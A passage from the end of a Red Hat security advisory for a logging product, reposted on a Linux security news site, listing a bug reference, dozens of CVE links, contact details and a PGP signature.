CLO panic: runtime error: slice bounds out of range [:-1] LOG-1970 - Applying cluster state is causing elasticsearch to hit an issue and become unusable 6.References: https://access.redhat.com/security/cve/CVE-2018-25009 https://access.redhat.com/security/cve/CVE-2018-25010 https://access.redhat.com/security/cve/CVE-2018-25012 https://access.redhat.com/security/cve/CVE-2018-25013 https://access.redhat.com/security/cve/CVE-2018-25014 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14145 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-17541 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-35521 https://access.redhat.com/security/cve/CVE-2020-35522 https://access.redhat.com/security/cve/CVE-2020-35523 https://access.redhat.com/security/cve/CVE-2020-35524 https://access.redhat.com/security/cve/CVE-2020-36330 https://access.redhat.com/security/cve/CVE-2020-36331 https://access.redhat.com/security/cve/CVE-2020-36332 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3426 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3481 https://access.redhat.com/security/cve/CVE-2021-3572 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3712 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-20317 https://access.redhat.com/security/cve/CVE-2021-21409 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-31535 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-37136 https://access.redhat.com/security/cve/CVE-2021-37137 https://access.redhat.com/security/cve/CVE-2021-42574 https://access.redhat.com/security/cve/CVE-2021-43267 https://access.redhat.com/security/cve/CVE-2021-43527 https://access.redhat.com/security/cve/CVE-2021-44228 https://access.redhat.com/security/updates/classification#moderate https://access.redhat.com/security/vulnerabilities/RHSB-2021-009 7. Contact: The Red Hat security contact is . More contact details at https://access.redhat.com/security/team/contact Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPGv1 iQIVAwUBYbj0/dzjgjWX9erEAQhPPA//Sz4DatavDzipsjYkWatXpkjVX252NfO/ oQbzojwDm9Fjg3DgB2rKx31JAEnGUWULd9ocI3EX4KglYHF0w3HaxiIQne1IyN3O 2Oqg9OPBBZ4NCPcfGBUKUB5iAxVdQoj83kG3yR31XnWK2hM1DR3VBhyN4hi4Kjvx Az9c5ffyEV8Q7V1OsDeC0HBFrcL8P4yUTJPQlkTNwrUM3vhqn1O51MG/H7iK967c 6Zpu5GkQBitiJodlF6KFLDn/ZB6VaiCXxOYNH+ns5Q/9s/tHfBw+kHj9p0Y69fWv rw02OK7Jq8L8PA+IQLGUgS69D4aXj76xTH8TTNb9mZO+9cHLVCRhoxcLk4jVgxXi +lrJWzNalHtKa6MSSNXWVGkcddJYQi1bF0Vdk8ng9Zz59/8L27QB4odg0LEfCODv 8GqkpWh/UZuuNsFrYhSxdjnNMe1enu9ymqqh7GQm9tJYGUZ5+sNwnHpElDvPu8Jq o249oos8BiqYMgHecDWiB4nGmBk5wAOC9RIPAgpLk66UfkCw6InKm702H3+VxtQu TJcSYdFssGXYdcfSFQaMJsy89lmd/oCtT4QzocKIhVqTKMN1/HwMDUqRwqZueqOu Ww5LE6+HwOHputf1w030xz7RbE3U+n0J96c35FJ/osWXhBqELxr31uIZivyPYmTv 2e/xGkTuCyo=Qn1G -----END PGP SIGNATURE----- -- RHSA-announce mailing list
Dec 14, 2021
Red Hat
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!